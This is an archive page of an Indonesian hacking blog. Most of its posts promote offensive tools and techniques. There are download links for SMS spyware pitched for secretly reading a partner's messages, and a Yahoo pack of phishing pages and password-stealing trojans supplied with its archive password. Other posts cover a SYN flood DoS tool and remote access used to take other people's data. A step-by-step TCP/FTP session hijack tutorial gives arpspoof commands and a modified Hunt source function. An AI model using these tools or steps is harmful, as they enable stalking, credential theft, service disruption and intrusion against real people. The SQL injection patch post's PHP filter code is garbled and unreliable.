Blog nya Orang Bego

Cyber, Hacking, Tutorial, Virus,Anti Virus and more

Arsip untuk ‘Hacking’ Kategori

PAtch Sql Injection’s

Ditulis oleh adixersoft di/pada 09/10/2009

Sekarang kita coba, untuk ngepatch bug SQLi itu sendiri.

Hallo adizonners sorry nich dach lama gak ngebloger lagi soalnya sibux ma kerjaan
oke sekrang gw mau bahas tentang security web agar terhindar dari serangan hacker
biasanya hacker menggunakan tehnik magic Quote alias SQL Injections
contoh:
Misalkan saja targetnya http://www.Targetkita.com/news.php?nid=76′
Ketika kita menambahkan quote (‘)pada akhir url, kita mendapatkan error.
Sekarang kita tahu bahwa file yang bermasalah adalah news.php dg input “nid”.
Sekarang kita lihat source codenya…abis itu kita petch biar terhindar dari serangan SQL injections

if($nid)
{
$sql = “SELECT * FROM News “;
$sql .= “WHERE News_ID = $nid”;
}
else
{
$sql = “SELECT * FROM News “;
$sql .= “ORDER BY News_ID DESC LIMIT 0,1″;
}

Nah, kelihatan kan?? jelas bahwa disitu tidak ada filter, sehinggal attacker bisa melakukan Injecti melalui input “$nid”.
Ada beberapa cara untuk patch bug SQLI, yaitu dengan memfilter karakter, maupun membatasi length pada input.
Beberapa perintahnya antara lain:

1. Agar hanya angka pada input
if (!preg_match(“/^[0-9]+$/”, $nid))
{
command;
}

2. Agar tidak ada nilai minus pada input
if ($nid 3)
{
command;
}

command bisa anda ganti sesuka anda.
Seboga artikel ini cukup berarti buat kalian para administrator web agar terhindar dari serangan hacker
Aapa lagi hacker maling sial….biasanya si kalo hacker indonesia gk pernah mau deface situs Indo…
paling cuman ngingetin doang…Oke sekian dulu..silahkan di coba
THx to : devil_nongkrong and devilzc0de crew

Ditulis dalam Hacking | Bertanda: , , , , , , , , , , , , | Leave a Comment »

10 of the best hacking and security software tools for Linux

Ditulis oleh adixersoft di/pada 04/05/2009

10 of the best hacking and security software tools for Linux

Linux is a hacker’s dream computer operating system. It supports tons of tools and utilities for cracking passwords, scanning network vulnerabilities, and detecting possible intrusions. Please always keep in mind that these tools are not meant to harm, but to protect.
Baca entri selengkapnya »

Ditulis dalam Hacking | Bertanda: , , , , | 1 Komentar »

FBI TOOLS

Ditulis oleh adixersoft di/pada 08/04/2009

-ADS Locator (Alternate Data Streams)
-Disc Investigator 1.4 (File-Slack-Analyze)
-Historian 1.4 (Browser Analyze)
-Live View 0.6 (System Analyze)
-MUI Cacheview 1.00 (Registry Analyze)
-Networkminer 0.85 (Network Analyze)
-Regripper 2.02 (Registry Analyze)
-Systemreport 2.54 (PC Analyze)
-USB-History R1 (USB-Stick-Analyze)
-Windows File Analyzer (File Analyze)
-Winpcap 4.02 (Network)

DOWNLOAD DI SINI

http://rapidshare.com/files/212952588/FBI.Tools.11.in.1.rar

Ditulis dalam Hacking | Bertanda: , , , | Leave a Comment »

SMS SPY (Sadap Sms Orang)

Ditulis oleh adixersoft di/pada 08/04/2009

pernah gak pacar lw selalu nyembunyiin hp nya? sms ngumpet-ngumpet?… mau tau doski sms apa aja? gw nemu cara nya ney… Menyadap sms lewat Internet dengan mendaftar ke www.bloove.com trus download file agent.sisx s60 pasang di hp yang akan di sadap… Gratis .

BUAT ADIZONNERS YANG PADA BILAnG LINK NYA MATI ATAU MINTA DI KIRIMIN KE EMAILNYA….BERHUBUNG BANYAK YANG MINTA INI SAYA KASIH LINK BARU….YANG PASTI NYA GAK KAN MATI NICH LINK……SILAHKAN DI COBA!!!! DAN HATI2 HP anda Telah di SPY oleh pasangan anda.. berikut link download atau link web serta penjelasanya ada di web link masing masing. Selamat menjadi mata-mata

1. http://www.smstrap.com/                           ===>> kalo yang ini cukup register

2. http://www.spymastertools.com/          ==>> kalo yang ini bayar gak geratis tapi lebih bagus

3.yang ketiga SMS spy hasil Upload tan gw……. pasti bisa di jalnin tinggal lo download aja

nich link nya : http://www.2shared.com/file/6350924/3cc66ad7/Spy_SMS_adizonnewordpresscon.html

Ok semuah nya mudah mudahan bermanfaat terimakasih ……

Ditulis dalam Hacking | Bertanda: , , , | 27 Komentar »

TOOL HACKING….!!!

Ditulis oleh adixersoft di/pada 03/03/2009

Yang pengen tools hacking lo bisa download di sini

kumplit apa aja ada……..tinggal download.

Does that make you download hacking tools that can Complate on the link below

do not forget to commend you…!!!

DOWNLOAD NOW

Ditulis dalam Hacking | Bertanda: , , , , , | 7 Komentar »

Yahoo Hacking Tools Portable

Ditulis oleh adixersoft di/pada 03/03/2009

adizonners kalo lo hobi chating-chatingan di YM pake tools ini untuk iseng-iseng jahat ya gw…hixhixhix. :-)

Image
========================== Yahoo Hacking Tools ===========================

Yahoo Hacking Tools adalah Tools Portable dalam Kegiatan Hacking Yahoo messenger.
dalam Yahoo Hacking Tools ini terdapat Software :

1. Emo Creator
Tools untuk membuat Icon2

2. Fake Pager
Adalah aplikasi Yahoo Messenger Palsu, yang berguna untuk mencuri user name
dan password.

3. Magic Password
Trojan yang digunakan untuk mencuri password

4. Yahoo Booter.
Aplikasi untuk memboot lawan chating

5. Yahoo Fake Cam
Tools untuk mengecoh lawan chating dengan Cam Palsu :twisted:

6. Yahoo Fake Login
Halaman Login Palsu Yahoo (2008), yah buat nyuri password orang yang akan dikirim ke email

7. Yahoo PAss Stealler
Trojan Builder untuk nyulik password :)

8. Yahoo Hack
Yahoo messengger Palsu

9. Yahoo Pass Crack
Crack Password Yahoo seseorang

10. Yahoo Password Recovery
Untuk mengetahui Password dan user name ym seseorang

Download : http://www.ziddu.com/download/2832248/Yahoo_hacking___pass_h4ck3v1l__.rar.html

Password : h4ck3v1l

Ditulis dalam Hacking | Bertanda: , , , , | 15 Komentar »

Dos Attack Dengan Syn Attack

Ditulis oleh adixersoft di/pada 25/02/2009

Adizonners … gw mao share pengetahuan dari hasil googeling di forum-forum Underground ;) smoga berguna. Jika anda tidak tau cara mendapatkan ip victim, lihat tutorialnya di Blog ini tutorial sniffing menggunakan wireshark.

1. Interface Syn Attack, tinggal anda masukan ip
Gampang kan :2thumbs: tinggal liat ja deh sukses apa gak :cooler:

Image

Download Syn Attack

Ditulis dalam Hacking | Bertanda: , , , , | 2 Komentar »

Exploit [nge-remote] komputer lain

Ditulis oleh adixersoft di/pada 25/02/2009

gimana sih untuk Meng-Exploit [nge-remote] komputer lain yang terhubung dalam satu LAN
biasanya sih aku pake kaht tapi kaht udah g bisa lagi untuk XP sp2

VNCViewer !!!

ini link downloadnya

http://www.realvnc.com/products/free/4.1/winvncviewer.html

trus ada banyak lagi yg laen
kalo mau antar komputer yg terhubung internet kaya rumah gue ama kantor gue lebih suka pake wallcooler atau hamachi
jadi gue bisa ambil data dari komputer ORAng lain , asik2 aja kan

Salam adi zonners uuupzzz…jangan di buat usilya tanggung sendiri akibatnya… :-)

Ditulis dalam Hacking | Bertanda: , , , , , , | 3 Komentar »

Yahoo Messenger SPY

Ditulis oleh adixersoft di/pada 05/02/2009

yahoo-messenger-spy-monitor-2008Adizonners mao tau gak caranya ngintip orang yang lagi cahtting pake nich tools yang satu ini namanya, Yahoo Messenger Spy tools ini berfungsi menangkap pembicaraan chating dari komputer lain dalam jaringan lokal. So.., berhati-hatilah kalau berbicara yang rahasia, jangan sampai orang yang tidak bertanggung jawab mengetahuinya.

Capture and Sniff Yahoo Messenger chat conversations on all computers in network,It is able to record conversations automatically in real time,And export all intercepted messages to HTML files.  :-)

Download Now

Ditulis dalam Hacking | Bertanda: , , , , , | 6 Komentar »

TCP Hijack

Ditulis oleh adixersoft di/pada 04/02/2009

TCP Hijack

lab-networkDisclaimer: This guide is meant for ethical hacking or audit with authorization purposes only. The author is not responsible for any consequences otherwise. The material is copyrighted.

Requirements: Linux OS, Connect to the same LAN or wireless network as the victim,

Once a malicious user gains access to the FTP session traffic he can now begin to monitor the session and wait for an opportunity to hijack the session. A hijack occurs when the attacker is able to intercept the communication between the client and server after the session has been authenticated. The simplest method to hijack the session would be to send a reset to the user forcing the client application to close the FTP session but he also have to prevent the client from resetting the port on the server end. If he does not prevent this packet from reaching the server then the connection will be terminated and he will have to wait for another opportunity to hijack a session. Once he has successfully closed the client, he now has the opportunity to send queries to the server requesting files or upload his own malicious files to the server. Since he was monitoring the entire session between the server and client he has the right sequence number and acknowledgment number so that the server thinks its still communicating with the original client.

If the attacker chooses to keep both the client and server running then he will have to keep track of the sequence number and acknowledgment number being sent between the client and server. Any command that the attacker sends to the server will change the sequence number and acknowledgment numbers and will cause the client and server to be out of synchronization and they will not be able to communicate thus causing the connection to close. This method is more difficult because the attacker now has to continually change the client and server sequence/acknowledgment numbers to reflect the commands that he injected towards the server and the data he received from the server.

You have to be on the same wireless or LAN network to accomplish this.

The process of FTP Hijack:

ARP Spoof

Arp spoof the victim to the gateway (Victim: 192.168.2.2; Gateway: 192.168.2.1) using arpspoof from the attacking machine (192.168.2.160) to redirect all traffic through the attacker.
CODE :

# echo 1 >; /proc/sys/net/ipv4/ip_forward
# arpspoof -t 192.168.2.1 192.168.2.2
# arpspoof -t 192.168.2.2 192.168.2.1

HUNT

Hunt is a program for intruding into a connection, watching it and resetting it. Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segments or hosts that are on switched ports. Hunt doesn’t distinguish between local network connections and connections going to/from Internet. It can handle all connections it sees. Connection hijacking is aimed primarily at the telnet or rlogin traffic but it can be used for another traffic too. Features: connection management (watching, spoofing, detecting, hijacking, resetting), daemons (resetting, arp spoof/relayer daemon, MAC discovery daemon for collecting MAC addresses, sniff daemon for logging TCP traffic), host resolving, packet engine (TCP, UDP, ICMP and ARP traffic; collecting TCP connections with sequence numbers and the ACK storm detection), switched environment (hosts on switched ports can be spoofed, sniffed and hijacked too). This latest release includes lots of debugging and fixes in order to get the hunt running against hosts on switched ports, timejobs, dropping IP fragments, verbose status bar, options, new connection indicator, various fixes.

By default, Hunt only monitors telnet (port 23) and rlogin (port 513) sessions, but the code is written in such a way that it would be very easy to add other types. In the file hunt.c, in the initialization code for the entry function, is this line:

CODE :

add_telnet_rlogin_policy();

This function is located in the addpolicy.c file and here’s the function in question:

CODE :

api->;dst_ports[2] = htons(21); was added to incorporate FTP sessions.

void add_telnet_rlogin_policy(void)
{
struct add_policy_info *api;

api = malloc(sizeof(struct add_policy_info));
assert(api);
memset(api, 0, sizeof(sizeof(struct add_policy_info)));
api->;src_addr = 0;
api->;src_mask = 0;
api->;dst_addr = 0;
api->;dst_mask = 0;
api->;src_ports[0] = 0;
api->;dst_ports[0] = htons(23);
api->;dst_ports[1] = htons(513);
api->;dst_ports[2] = htons(21); //This port was added for FTP
api->;dst_ports[3] = 0;
list_push(&;l_add_policy, api);
};

The source files were compiled and hunt.c executed.

CODE :

/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 64/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
--

HUNT Preparations

Customize Options and Start Daemons

o is typed to customize options. The MAC base is changed to attacker’s NIC 00:ab:cd:ef:gh:mn. Host resolving, arp spoof with MAC base and learn IP from MAC discovery are all enabled.

From the main menu, d daemons — a arp spoof daemon is started. Hunt can also arp spoof the hosts and targets if specified.

FTP Hijack

From the main menu, l gives a list of connections.

0) 192.168.2.2 [32777] — 95.623.58.102 [21]

w – Watches the above connnection.
a – Performs a simple hijack.

Once you hijack, you have access to the files being sent. You can manipulate them using a tool like fragroute to craft evil packets. If the connection is telnet on port 23, you will have the shell on both the machines.

Impact

? Access to Data
? Access to the command shell
? DOS Attack

Ditulis dalam Hacking | Bertanda: , , , , | Leave a Comment »